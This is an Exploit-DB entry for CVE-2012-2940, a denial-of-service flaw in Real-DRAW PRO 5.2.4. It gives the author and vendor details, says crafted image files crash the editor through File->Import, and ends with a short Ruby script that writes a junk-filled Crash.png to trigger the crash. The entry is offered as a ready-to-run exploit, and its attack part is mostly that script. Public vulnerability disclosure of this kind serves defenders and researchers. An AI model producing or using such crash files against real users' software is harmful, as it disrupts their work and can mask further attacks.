Real-DRAW PRO 5.2.4 - Import File Crash

Author: Ahmed Elhady Mohamed
type: dos
platform: windows
port: 
date_added: 2012-05-21  
date_updated: 2012-05-21  
verified: 1  
codes: OSVDB-82303;CVE-2012-2940  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-21-at-20724-pm.png  
application_url:   

raw file: 18902.rb  

Real-DRAW PRO 5.2.4 Import File Crash
===================================================================================
# Exploit Title:Real-DRAW PRO 5.2.4 Malicious PNG File Denial of service
# Vendor : http://www.mediachance.com/
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# Website: www.infosec4all.tk
# version: 5.2.4
# Category: DOS
# Tested on: windows XP SP3
===================================================================================



########################################DESC#############################################
#Real-Draw seamlessly combines vector tools with the rich look of pixel based images and#
#innovative natural paint techniques into a single graphics editor.                     #
#########################################################################################

########################################################################################
#Real-DRAW PRO 5.2.4 crashes while importing a crafted PNG, WMF, PSD, TGA, TTF, BMP,   #
#TIFF and PCX file                                                                     #
#To trigger the exploit , go to file->Import                                           #
########################################################################################


#!/usr/bin/ruby


File.open "Crash.png" , "w" do |file|
junk = "A" *1000
file.write junk
end